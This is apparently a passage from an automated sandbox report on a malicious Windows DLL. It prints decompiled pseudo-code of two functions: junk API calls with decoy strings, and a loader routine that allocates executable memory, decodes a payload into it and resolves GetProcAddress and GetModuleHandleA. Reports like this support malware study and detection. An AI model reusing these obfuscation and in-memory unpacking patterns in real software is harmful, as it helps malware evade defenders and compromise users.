                                                                                                                                    • API ID: File$CreateEnumObjectResourceSecurity$ClassCommDisconnectDisplayEventInitializeLockLookupNameNamedNamesPipePrivatePrivilegeReadRevokeSetupTimeTypesWriteclosesocket
                                                                                                                                    • String ID: CloseFarmhouse32$EnumMicrophyte32$SeemNicotinamide32$StandMarmite$TakePenult32$_DrawPossible64$ps
                                                                                                                                    • API String ID: 3842444896-518994227
                                                                                                                                    • Opcode ID: 9be607a9c30f1dc462925bd8c6da3221bc20c9a2c9e65bab476b936ed2a92c01
                                                                                                                                    • Instruction ID: 947adcdb501bdb38e5136524d9c40120a5182d8553022d98caa5c4c0717f626f
                                                                                                                                    • Opcode Fuzzy Hash: 9be607a9c30f1dc462925bd8c6da3221bc20c9a2c9e65bab476b936ed2a92c01
                                                                                                                                    • Instruction Fuzzy Hash: EA81C8B55083559FE304CF54C884CABBBF9FBD9740F008A1EF59583264D634E989CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E10002C7C(intOrPtr* __ebx, intOrPtr* __edi, void* __ebp, char _a4, char _a8, char _a12, char _a16, void* _a20, void _a24, char _a28, struct _SECURITY_ATTRIBUTES _a32, intOrPtr _a36, char _a40, short _a44, char _a46, intOrPtr _a48, intOrPtr _a52, char _a56, signed int _a60) {
                                                                                                                                    				char _v0;
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				void* _v24;
                                                                                                                                    				void* _v28;
                                                                                                                                    				void _v32;
                                                                                                                                    				long _v36;
                                                                                                                                    				long _v40;
                                                                                                                                    				int _t67;
                                                                                                                                    				struct _SECURITY_ATTRIBUTES _t79;
                                                                                                                                    				short _t80;
                                                                                                                                    				intOrPtr _t88;
                                                                                                                                    				char _t89;
                                                                                                                                    				char _t90;
                                                                                                                                    				intOrPtr _t91;
                                                                                                                                    				intOrPtr* _t106;
                                                                                                                                    				void* _t107;
                                                                                                                                    				CHAR* _t113;
                                                                                                                                    				intOrPtr _t116;
                                                                                                                                    				char _t117;
                                                                                                                                    				intOrPtr _t121;
                                                                                                                                    				intOrPtr _t122;
                                                                                                                                    				char _t123;
                                                                                                                                    				intOrPtr _t124;
                                                                                                                                    				intOrPtr _t131;
                                                                                                                                    				char _t142;
                                                                                                                                    				char _t143;
                                                                                                                                    				char _t147;
                                                                                                                                    				intOrPtr _t149;
                                                                                                                                    				char _t150;
                                                                                                                                    				intOrPtr* _t159;
                                                                                                                                    				void* _t160;
                                                                                                                                    				void* _t161;
                                                                                                                                    				signed int _t164;
                                                                                                                                    
                                                                                                                                    				_t159 = __edi;
                                                                                                                                    				_t106 = __ebx;
                                                                                                                                    				do {
                                                                                                                                    					_t67 = _a20;
                                                                                                                                    					RegCreateKeyExW( &_a24, L"CloseFarmhouse32", _t67, L"_DrawPossible64", _t67,  &_a24,  &_a32,  &_a20,  &_a24);
                                                                                                                                    					 *_t159( &_a16);
                                                                                                                                    					 *_t106(_a12);
                                                                                                                                    					__imp__CoFileTimeNow( &_a12);
                                                                                                                                    					_t113 =  &_a4;
                                                                                                                                    					__imp__CoInitializeSecurity( &_a8, _t113, _t113,  &_a12, _a4, _a12,  &_a8, _a8,  &_a4);
                                                                                                                                    					CreatePrivateObjectSecurity( &_v24,  &_v32,  &_v32,  &_v24,  &_v32, _t114); // executed
                                                                                                                                    					DisconnectNamedPipe( &_v24);
                                                                                                                                    					_t142 = "SeemNicotinamide32"; // 0x6d656553
                                                                                                                                    					_t79 = M1000A1F4; // 0x6f63694e
                                                                                                                                    					_t116 = M1000A1F8; // 0x616e6974
                                                                                                                                    					_a28 = _t142;
                                                                                                                                    					_t143 = M1000A1FC; // 0x6564696d
                                                                                                                                    					_a32 = _t79;
                                                                                                                                    					_t80 =  *0x1000a200; // 0x3233
                                                                                                                                    					_a40 = _t143;
                                                                                                                                    					_a36 = _t116;
                                                                                                                                    					_t117 =  *0x1000a202; // 0x0
                                                                                                                                    					_a44 = _t80;
                                                                                                                                    					_a46 = _t117;
                                                                                                                                    					EnumResourceNamesA( &_v32,  &_a28,  &_v28,  &_v24);
                                                                                                                                    					EnumResourceTypesW( &_v36,  &_v36,  &_v28);
                                                                                                                                    					LockFile( &_v32, _v32, _v40, _v40, _v40);
                                                                                                                                    					_t147 = "StandMarmite"; // 0x6e617453
                                                                                                                                    					_t88 = M1000A1E4; // 0x72614d64
                                                                                                                                    					_t121 =  *0x1000a1e8; // 0x6574696d
                                                                                                                                    					_v12 = _t147;
                                                                                                                                    					_v8 = _t88;
                                                                                                                                    					_t89 = "TakePenult32"; // 0x656b6154
                                                                                                                                    					_v4 = _t121;
                                                                                                                                    					_t122 = M1000A1D4; // 0x756e6550
                                                                                                                                    					_v0 =  *0x1000a1ec & 0x000000ff;
                                                                                                                                    					_t149 =  *0x1000a1d8; // 0x3233746c
                                                                                                                                    					_a4 = _t89;
                                                                                                                                    					_t90 =  *0x1000a1dc; // 0x0
                                                                                                                                    					_a8 = _t122;
                                                                                                                                    					_t123 = "EnumMicrophyte32"; // 0x6d756e45
                                                                                                                                    					_a12 = _t149;
                                                                                                                                    					_t150 = M1000A1C0; // 0x7263694d
                                                                                                                                    					_a16 = _t90;
                                                                                                                                    					_t91 = M1000A1C4; // 0x7968706f
                                                                                                                                    					_a40 = _t123;
                                                                                                                                    					_t124 =  *0x1000a1c8; // 0x32336574
                                                                                                                                    					_a44 = _t150;
                                                                                                                                    					_a48 = _t91;
                                                                                                                                    					_a52 = _t124;
                                                                                                                                    					_a56 =  *0x1000a1cc & 0x000000ff;
                                                                                                                                    					LookupPrivilegeDisplayNameA( &_v12,  &_a4,  &_a40,  &_v36,  &_v40); // executed
                                                                                                                                    					ReadEventLogW( &_v40, _v36, _v40,  &_v40, _v40,  &_v40,  &_v32);
                                                                                                                                    					SetupComm( &_v40, _v40, _v32);
                                                                                                                                    					WriteFile( &_v32,  &_v32, _v40,  &_v40,  &_v40); // executed
                                                                                                                                    					_t64 =  &_v28;
                                                                                                                                    					 *_t64 = _v28 - 1;
                                                                                                                                    				} while ( *_t64 != 0);
                                                                                                                                    				_t131 =  *0x1000e350; // 0x13a
                                                                                                                                    				_t158 =  *0x1000e3c4;
                                                                                                                                    				if( *0x1000e3c4 >= _t131 -  *0x1000e368) {
                                                                                                                                    					 *0x1000e14c = 0xb0e;
                                                                                                                                    				}
                                                                                                                                    				_pop(_t160);
                                                                                                                                    				_pop(_t161);
                                                                                                                                    				_pop(_t107);
                                                                                                                                    				return E10002ECD(1, _t107, _a60 ^ _t164, _t158, _t160, _t161);
                                                                                                                                    			}
                                                                                                                                    0x10002ebf
                                                                                                                                    0x10002eca

                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10002CA7
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10002CAE
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10002CB5
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10002CBC
                                                                                                                                    • CoInitializeSecurity.OLE32(?,?,?,?,000000C1,?,?,?,0000014A), ref: 10002CED
                                                                                                                                    • CreatePrivateObjectSecurity.KERNELBASE(?,0000014A,0000014A,?,0000014A,0000014A), ref: 10002D03
                                                                                                                                    • DisconnectNamedPipe.KERNELBASE(000000C1), ref: 10002D0E
                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,000000C1,000000C1), ref: 10002D64
                                                                                                                                    • EnumResourceTypesW.KERNEL32(?,?,000000C1), ref: 10002D77
                                                                                                                                    • LockFile.KERNEL32(?,?,0000014A,0000014A,0000014A), ref: 10002D8E
                                                                                                                                    • LookupPrivilegeDisplayNameA.ADVAPI32(?,?,?,000000C1,0000014A), ref: 10002E2D
                                                                                                                                    • ReadEventLogW.ADVAPI32(?,000000C1,000000C1,?,000000C1,?,000000C1), ref: 10002E50
                                                                                                                                    • SetupComm.KERNEL32(000000C1,0000014A,000000C1), ref: 10002E65
                                                                                                                                    • WriteFile.KERNELBASE(?,?,0000014A,0000014A,0000014A), ref: 10002E80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CreateEnumObjectResourceSecurity$ClassCommDisconnectDisplayEventInitializeLockLookupNameNamedNamesPipePrivatePrivilegeReadRevokeSetupTimeTypesWriteclosesocket
                                                                                                                                    • String ID: CloseFarmhouse32$EnumMicrophyte32$SeemNicotinamide32$StandMarmite$TakePenult32$_DrawPossible64
                                                                                                                                    • API String ID: 3842444896-1362671101
                                                                                                                                    • Opcode ID: 5dd8d1a8b6dd083af997c632291955c82987fad54249d7bf4b38c638d76e0795
                                                                                                                                    • Instruction ID: ebae14217037ee31ebf82a92329a745a2ec3e2602b48421e106ee894ce46e2ac
                                                                                                                                    • Opcode Fuzzy Hash: 5dd8d1a8b6dd083af997c632291955c82987fad54249d7bf4b38c638d76e0795
                                                                                                                                    • Instruction Fuzzy Hash: 9871A9B55083559FE304CF54C894CABBBF9FBD9740F008A1EF59583264E634E989CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E100026C8(void* __ecx, short __edx, void* __ebp, void* _a24, void* _a28, char _a32, signed int _a148) {
                                                                                                                                    				signed int _t23;
                                                                                                                                    				void* _t24;
                                                                                                                                    				short _t25;
                                                                                                                                    				signed short _t27;
                                                                                                                                    				short _t28;
                                                                                                                                    				short _t29;
                                                                                                                                    				short _t30;
                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    				signed int _t34;
                                                                                                                                    				signed int _t36;
                                                                                                                                    				signed int _t37;
                                                                                                                                    				char** _t38;
                                                                                                                                    				intOrPtr _t39;
                                                                                                                                    				intOrPtr _t40;
                                                                                                                                    				signed int _t42;
                                                                                                                                    				void* _t43;
                                                                                                                                    				signed int _t47;
                                                                                                                                    				signed int _t50;
                                                                                                                                    				intOrPtr _t52;
                                                                                                                                    				void* _t65;
                                                                                                                                    				intOrPtr _t66;
                                                                                                                                    				intOrPtr _t67;
                                                                                                                                    				void* _t68;
                                                                                                                                    				void* _t69;
                                                                                                                                    				intOrPtr _t70;
                                                                                                                                    				void* _t71;
                                                                                                                                    				void* _t72;
                                                                                                                                    				char _t75;
                                                                                                                                    				signed int _t76;
                                                                                                                                    				intOrPtr _t78;
                                                                                                                                    				signed int _t80;
                                                                                                                                    				char** _t81;
                                                                                                                                    				intOrPtr _t82;
                                                                                                                                    				char** _t92;
                                                                                                                                    				intOrPtr _t93;
                                                                                                                                    				char** _t94;
                                                                                                                                    				void* _t95;
                                                                                                                                    				short _t97;
                                                                                                                                    				void* _t98;
                                                                                                                                    				void* _t100;
                                                                                                                                    				signed char _t102;
                                                                                                                                    				intOrPtr _t114;
                                                                                                                                    				intOrPtr _t115;
                                                                                                                                    				signed int _t120;
                                                                                                                                    				signed short _t121;
                                                                                                                                    				intOrPtr _t122;
                                                                                                                                    				intOrPtr _t124;
                                                                                                                                    				intOrPtr _t125;
                                                                                                                                    				signed int _t131;
                                                                                                                                    				intOrPtr _t132;
                                                                                                                                    				signed int _t135;
                                                                                                                                    				void* _t138;
                                                                                                                                    				void* _t149;
                                                                                                                                    				void* _t163;
                                                                                                                                    				void* _t167;
                                                                                                                                    				void* _t178;
                                                                                                                                    				void* _t179;
                                                                                                                                    
                                                                                                                                    				_t65 = __ecx;
                                                                                                                                    				do {
                                                                                                                                    					_t65 = _t65 - 1;
                                                                                                                                    					 *0x1000e14e = __edx;
                                                                                                                                    				} while (_t65 != 0);
                                                                                                                                    				_t66 =  *0x1000e1a0; // 0x11e
                                                                                                                                    				_t138 = _t66 -  *0x1000e324; // 0x1f2
                                                                                                                                    				_t92 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    				if(_t138 >= 0) {
                                                                                                                                    					 *0x1000e1c0 = 0x8a;
                                                                                                                                    				}
                                                                                                                                    				_t92[1] = 0x331;
                                                                                                                                    				_t92[2] = 0x9e3;
                                                                                                                                    				_t23 =  *0x1000e264 & 0x0000ffff;
                                                                                                                                    				_t67 =  *0x1000e1f8; // 0x1d8
                                                                                                                                    				if(_t23 == 0x150) {
                                                                                                                                    					_t132 =  *0x1000dffc; // 0x139
                                                                                                                                    					while(_t67 == _t132) {
                                                                                                                                    						_t23 = _t23 - 0xe1;
                                                                                                                                    						_t67 = _t67 + 0xe1;
                                                                                                                                    						 *0x1000df3f = 0x6a;
                                                                                                                                    						if(_t23 == 0x150) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L8;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L8:
                                                                                                                                    				_t92[3] = 0x9000;
                                                                                                                                    				_t93 =  *0x1000e134; // 0x8a
                                                                                                                                    				_t24 = 0x76;
                                                                                                                                    				_t68 = 0x76;
                                                                                                                                    				if(_t93 <= 0x76) {
                                                                                                                                    					_t131 =  *0x1000e3c8; // 0x140
                                                                                                                                    					_t120 =  *0x1000e368; // 0x81
                                                                                                                                    					while(_t68 == 0x76) {
                                                                                                                                    						 *0x1000e33c = 0x32;
                                                                                                                                    						if((_t120 ^ _t131) < _t68) {
                                                                                                                                    							 *0x1000e1d8 = 0xd7;
                                                                                                                                    						}
                                                                                                                                    						_t24 = _t24 - 1;
                                                                                                                                    						_t68 = _t68 + 1;
                                                                                                                                    						if(_t24 >= _t93) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L14;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L14:
                                                                                                                                    				_t25 =  *0x1000e1ac;
                                                                                                                                    				_t69 = 0x65;
                                                                                                                                    				if(_t25 <= 0x1b) {
                                                                                                                                    					while(_t69 >= 0xffbb) {
                                                                                                                                    						_t25 = _t25 + 0x65;
                                                                                                                                    						_t69 = _t69 - 1;
                                                                                                                                    						 *0x1000ded4 = 0x88;
                                                                                                                                    						if(_t25 <= 0x1b) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L18;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L18:
                                                                                                                                    				_t94 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    				 *_t94 = "Erodium"; // executed
                                                                                                                                    				_a24 = VirtualAlloc(0, 0x1e3c, 0x3000, 0x40);
                                                                                                                                    				_t27 =  *0x1000e26c; // 0x10e
                                                                                                                                    				_t149 = _t27 -  *0x1000e144; // 0x83
                                                                                                                                    				if(_t149 < 0) {
                                                                                                                                    					_t70 =  *0x1000dfc4; // 0xe27
                                                                                                                                    				} else {
                                                                                                                                    					_t70 = 0x8c;
                                                                                                                                    					 *0x1000dfc4 = 0x8c;
                                                                                                                                    				}
                                                                                                                                    				_t28 =  *0x1000e184;
                                                                                                                                    				while(_t28 == 0xa) {
                                                                                                                                    					_t28 = _t28 - _t70;
                                                                                                                                    					 *0x1000e28c = 1;
                                                                                                                                    					 *0x1000e07e = 0x62;
                                                                                                                                    					 *0x1000e338 = 0x7c;
                                                                                                                                    				}
                                                                                                                                    				_t29 =  *0x1000e03c;
                                                                                                                                    				_t121 =  *0x1000e208; // 0x3b
                                                                                                                                    				_a28 = 0;
                                                                                                                                    				_t71 = 0x11;
                                                                                                                                    				_t95 = 0x68;
                                                                                                                                    				if(_t29 == 0xad) {
                                                                                                                                    					while(_t121 == _t71 && _t95 >=  *0x1000e020) {
                                                                                                                                    						_t29 = _t29 - 0x62;
                                                                                                                                    						_t95 = _t95 - 1;
                                                                                                                                    						_t121 = _t121 + 0x99;
                                                                                                                                    						_t71 = 0x9b;
                                                                                                                                    						 *0x1000e300 = 0x389;
                                                                                                                                    						 *0x1000e208 = 0x2b;
                                                                                                                                    						if(_t29 == 0xad) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L29;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L29:
                                                                                                                                    				_t30 =  *0x1000de8c;
                                                                                                                                    				_t122 =  *0x1000e1a0; // 0x11e
                                                                                                                                    				 *0x1000f0e0 =  &_a32;
                                                                                                                                    				_t97 =  *0x1000e078;
                                                                                                                                    				_t72 = 0xc4;
                                                                                                                                    				if(_t30 <= _t97) {
                                                                                                                                    					while(_t72 == 0xc4 && _t122 >=  *0x1000e3c4) {
                                                                                                                                    						_t30 = _t30 + 1;
                                                                                                                                    						_t122 = _t122 - 1;
                                                                                                                                    						 *0x1000e0e0 = 0;
                                                                                                                                    						 *0x1000e1d8 = 0x55;
                                                                                                                                    						 *0x1000df3f = 0x1d;
                                                                                                                                    						 *0x1000e14e = 0xd40;
                                                                                                                                    						_t72 = 0xc5;
                                                                                                                                    						if(_t30 <= _t97) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L34;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L34:
                                                                                                                                    				_t98 = _a28;
                                                                                                                                    				do {
                                                                                                                                    					_t31 =  *0x1000f0e0; // 0x30f8e8
                                                                                                                                    					_t32 =  *0x1000f0e8; // 0x78f
                                                                                                                                    					 *0x1000f0e8 = _t32 + 1;
                                                                                                                                    					_t34 =  *0x1000e26c & 0x0000ffff;
                                                                                                                                    					_t75 =  *((intOrPtr*)( *_t31 + _t32 * 4)) - 0x45907;
                                                                                                                                    					while(_t34 == 0xbb) {
                                                                                                                                    						_t34 = _t34 + 1;
                                                                                                                                    						 *0x1000e388 = 0x42;
                                                                                                                                    						 *0x1000e134 = 0xd9;
                                                                                                                                    						 *0x1000e106 = 0xda;
                                                                                                                                    						 *0x1000e2fc = 0x440;
                                                                                                                                    					}
                                                                                                                                    					 *((char*)(_t98 + _a24)) = _t75;
                                                                                                                                    					_t98 = _t98 + 1;
                                                                                                                                    				} while (_t98 < 0x78f);
                                                                                                                                    				_t76 =  *0x1000debc; // 0x1e7
                                                                                                                                    				_t163 = (_t76 ^ 0x000000c0) -  *0x1000e114; // 0x99
                                                                                                                                    				if(_t163 <= 0) {
                                                                                                                                    					 *0x1000ded4 = 0x2c;
                                                                                                                                    				}
                                                                                                                                    				_t36 =  *0x1000e188 & 0x0000ffff;
                                                                                                                                    				while(_t36 == 0x859) {
                                                                                                                                    					_t36 = _t36 + 1;
                                                                                                                                    					 *0x1000e38c = 0xb2;
                                                                                                                                    					 *0x1000e400 = 0xb1;
                                                                                                                                    					 *0x1000e138 = 0x826;
                                                                                                                                    				}
                                                                                                                                    				_t37 =  *0x1000e208 & 0x0000ffff;
                                                                                                                                    				_a24 = _a24 + 0xb2;
                                                                                                                                    				_t78 =  *0x1000e040; // 0x16e
                                                                                                                                    				_t100 = 9;
                                                                                                                                    				if(_t37 <= 0x1f2) {
                                                                                                                                    					while(1) {
                                                                                                                                    						_t167 = _t100 -  *0x1000e108; // 0x51
                                                                                                                                    						if(_t167 != 0 || _t78 != 0x298) {
                                                                                                                                    							goto L49;
                                                                                                                                    						}
                                                                                                                                    						_t37 = _t37 + 1;
                                                                                                                                    						_t100 = _t100 - 1;
                                                                                                                                    						 *0x1000df3c = 0xae;
                                                                                                                                    						 *0x1000e14e = 0x6b4;
                                                                                                                                    						 *0x1000e07e = 0xd8;
                                                                                                                                    						 *0x1000e1e0 = 0x55;
                                                                                                                                    						_t78 = 0x299;
                                                                                                                                    						if(_t37 <= 0x1f2) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L49;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L49:
                                                                                                                                    				_t38 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    				_t38[5] = GetProcAddress;
                                                                                                                                    				_t39 =  *0x1000df08; // 0x9f
                                                                                                                                    				if(_t39 <= 0xbb) {
                                                                                                                                    					_t50 = (0xb81702e1 * (0x000000bb - _t39 & 0x0000ffff) >> 0x00000020 >> 0x00000007) + 0x00000001 & 0x0000ffff;
                                                                                                                                    					do {
                                                                                                                                    						_t50 = _t50 - 1;
                                                                                                                                    						 *0x1000dfb4 = 0x54;
                                                                                                                                    						 *0x1000dfc4 = 0xe27;
                                                                                                                                    						 *0x1000e07e = 0x82;
                                                                                                                                    						 *0x1000df3f = 0x87;
                                                                                                                                    					} while (_t50 != 0);
                                                                                                                                    				}
                                                                                                                                    				_t40 =  *0x1000e350; // 0x13a
                                                                                                                                    				_t80 =  *0x1000e100 & 0x0000ffff;
                                                                                                                                    				 *0x1000f0dc = _a24;
                                                                                                                                    				if(_t40 <= 0xc6) {
                                                                                                                                    					while(_t80 == 0x67) {
                                                                                                                                    						_t40 = _t40 + 1;
                                                                                                                                    						 *0x1000e1d8 = 0xcc;
                                                                                                                                    						 *0x1000e14c = 0xd6b;
                                                                                                                                    						 *0x1000e28c = 0x2b4;
                                                                                                                                    						 *0x1000dfb4 = 0x98;
                                                                                                                                    						_t80 = 0x66;
                                                                                                                                    						if(_t40 <= 0xc6) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L56;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L56:
                                                                                                                                    				_t42 =  *0x1000ded4 & 0x0000ffff;
                                                                                                                                    				if(_t42 >= 0x136) {
                                                                                                                                    					_t47 = _t42 + 0xfffffecb & 0x0000ffff;
                                                                                                                                    					do {
                                                                                                                                    						_t47 = _t47 - 1;
                                                                                                                                    						 *0x1000e210 = 0xa0;
                                                                                                                                    						 *0x1000e07d = 0xa8;
                                                                                                                                    						 *0x1000e138 = 0xa4;
                                                                                                                                    						 *0x1000e12c = 0x837;
                                                                                                                                    					} while (_t47 != 0);
                                                                                                                                    				}
                                                                                                                                    				_t81 =  *0x1000f0d0; // 0x7c0000
                                                                                                                                    				_t102 = GetModuleHandleA;
                                                                                                                                    				_t81[6] = GetModuleHandleA;
                                                                                                                                    				_t82 =  *0x1000e350; // 0x13a
                                                                                                                                    				_t43 = 0xffffffc9;
                                                                                                                                    				_t178 =  *0x1000df00 - _t43; // 0x129
                                                                                                                                    				if(_t178 == 0) {
                                                                                                                                    					_t125 =  *0x1000dfcc; // 0x29
                                                                                                                                    					_t115 =  *0x1000e020; // 0x19c
                                                                                                                                    					_t102 =  *0x1000e10f; // -76
                                                                                                                                    					while(1) {
                                                                                                                                    						_t179 = _t82 -  *0x1000df94; // 0x88
                                                                                                                                    						if(_t179 > 0) {
                                                                                                                                    							goto L65;
                                                                                                                                    						}
                                                                                                                                    						 *0x1000df35 = 0xb5;
                                                                                                                                    						 *0x1000ded7 = 0x1b;
                                                                                                                                    						 *0x1000e290 = 0xad;
                                                                                                                                    						 *0x1000ded6 = 0xd1;
                                                                                                                                    						if((_t102 ^  *0x1000e22c) <= _t125) {
                                                                                                                                    							 *0x1000e07e = 0xb1;
                                                                                                                                    						}
                                                                                                                                    						_t43 = _t43 + _t115;
                                                                                                                                    						_t82 = _t82 + 0x28;
                                                                                                                                    						if(_t43 == 0xffffffc9) {
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						goto L65;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L65:
                                                                                                                                    				_pop(_t114);
                                                                                                                                    				_pop(_t124);
                                                                                                                                    				_pop(_t52);
                                                                                                                                    				return E10002ECD(0xb2, _t52, _a148 ^ _t135, _t102, _t114, _t124);
                                                                                                                                    			}





























































                                                                                                                                    0x100027ba
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027bc
                                                                                                                                    0x100027bc
                                                                                                                                    0x100027d0
                                                                                                                                    0x100027da
                                                                                                                                    0x100027de
                                                                                                                                    0x100027e4
                                                                                                                                    0x100027eb
                                                                                                                                    0x100027fa
                                                                                                                                    0x100027ed
                                                                                                                                    0x100027ed
                                                                                                                                    0x100027f2
                                                                                                                                    0x100027f2
                                                                                                                                    0x10002800
                                                                                                                                    0x1000280a
                                                                                                                                    0x10002820
                                                                                                                                    0x10002825
                                                                                                                                    0x1000282b
                                                                                                                                    0x10002832
                                                                                                                                    0x10002832
                                                                                                                                    0x1000283a
                                                                                                                                    0x10002846
                                                                                                                                    0x1000284c
                                                                                                                                    0x10002854
                                                                                                                                    0x10002859
                                                                                                                                    0x1000285e
                                                                                                                                    0x10002870
                                                                                                                                    0x1000287f
                                                                                                                                    0x10002882
                                                                                                                                    0x10002885
                                                                                                                                    0x10002890
                                                                                                                                    0x10002895
                                                                                                                                    0x1000289b
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028a1
                                                                                                                                    0x10002870
                                                                                                                                    0x100028a3
                                                                                                                                    0x100028a3
                                                                                                                                    0x100028aa
                                                                                                                                    0x100028b4
                                                                                                                                    0x100028ba
                                                                                                                                    0x100028c3
                                                                                                                                    0x100028c8
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028e4
                                                                                                                                    0x100028e7
                                                                                                                                    0x100028ec
                                                                                                                                    0x100028f3
                                                                                                                                    0x100028fd
                                                                                                                                    0x10002903
                                                                                                                                    0x1000290a
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000290f
                                                                                                                                    0x100028d1
                                                                                                                                    0x10002911
                                                                                                                                    0x10002911
                                                                                                                                    0x10002924
                                                                                                                                    0x10002924
                                                                                                                                    0x1000292b
                                                                                                                                    0x10002936
                                                                                                                                    0x1000293b
                                                                                                                                    0x10002942
                                                                                                                                    0x1000294c
                                                                                                                                    0x10002950
                                                                                                                                    0x10002957
                                                                                                                                    0x10002961
                                                                                                                                    0x10002967
                                                                                                                                    0x1000296e
                                                                                                                                    0x1000296e
                                                                                                                                    0x1000297a
                                                                                                                                    0x1000297d
                                                                                                                                    0x10002980
                                                                                                                                    0x10002988
                                                                                                                                    0x10002994
                                                                                                                                    0x1000299a
                                                                                                                                    0x1000299c
                                                                                                                                    0x1000299c
                                                                                                                                    0x100029ab
                                                                                                                                    0x100029b2
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029c7
                                                                                                                                    0x100029d1
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029e0
                                                                                                                                    0x100029e7
                                                                                                                                    0x100029f3
                                                                                                                                    0x100029f9
                                                                                                                                    0x100029fe
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002a18
                                                                                                                                    0x10002a1b
                                                                                                                                    0x10002a22
                                                                                                                                    0x10002a28
                                                                                                                                    0x10002a2f
                                                                                                                                    0x10002a36
                                                                                                                                    0x10002a40
                                                                                                                                    0x10002a45
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002a45
                                                                                                                                    0x10002a07
                                                                                                                                    0x10002a47
                                                                                                                                    0x10002a47
                                                                                                                                    0x10002a52
                                                                                                                                    0x10002a55
                                                                                                                                    0x10002a5e
                                                                                                                                    0x10002a78
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002a93
                                                                                                                                    0x10002a99
                                                                                                                                    0x10002a9f
                                                                                                                                    0x10002aa5
                                                                                                                                    0x10002aa5
                                                                                                                                    0x10002a90
                                                                                                                                    0x10002aad
                                                                                                                                    0x10002abb
                                                                                                                                    0x10002ac2
                                                                                                                                    0x10002ac8
                                                                                                                                    0x10002ae0
                                                                                                                                    0x10002ae6
                                                                                                                                    0x10002aee
                                                                                                                                    0x10002af4
                                                                                                                                    0x10002afb
                                                                                                                                    0x10002b01
                                                                                                                                    0x10002b07
                                                                                                                                    0x10002b0c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002b0c
                                                                                                                                    0x10002ae0
                                                                                                                                    0x10002b0e
                                                                                                                                    0x10002b16
                                                                                                                                    0x10002b1d
                                                                                                                                    0x10002b24
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b43
                                                                                                                                    0x10002b49
                                                                                                                                    0x10002b4f
                                                                                                                                    0x10002b55
                                                                                                                                    0x10002b55
                                                                                                                                    0x10002b40
                                                                                                                                    0x10002b5d
                                                                                                                                    0x10002b63
                                                                                                                                    0x10002b69
                                                                                                                                    0x10002b6c
                                                                                                                                    0x10002b72
                                                                                                                                    0x10002b77
                                                                                                                                    0x10002b7d
                                                                                                                                    0x10002b7f
                                                                                                                                    0x10002b85
                                                                                                                                    0x10002b8c
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002b92
                                                                                                                                    0x10002b98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002ba3
                                                                                                                                    0x10002bac
                                                                                                                                    0x10002bb3
                                                                                                                                    0x10002bbd
                                                                                                                                    0x10002bc4
